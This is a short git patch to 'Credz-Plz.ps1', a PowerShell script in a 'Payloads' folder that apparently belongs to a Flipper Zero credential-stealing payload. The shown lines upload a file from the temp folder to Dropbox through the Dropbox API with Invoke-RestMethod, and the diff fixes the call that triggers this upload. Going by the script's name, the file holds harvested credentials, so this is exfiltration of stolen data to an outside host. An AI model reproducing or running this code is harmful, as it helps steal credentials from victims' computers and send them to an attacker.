From cf558e035efa50180243276517a695d4c70b4e01 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 21:58:34 -0600 Subject: [PATCH] Update Credz-Plz.ps1 --- Payloads/Flip-Credz-Plz/Credz-Plz.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 index 2be3c19..821cb4a 100644 --- a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 +++ b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 @@ -159,7 +159,7 @@ $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } -if (-not ([string]::IsNullOrEmpty($db))){dropbox -FileName $env:TMP\$FileName} +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -FileName $env:TMP\$FileName} #------------------------------------------------------------------------------------------------------------------------------------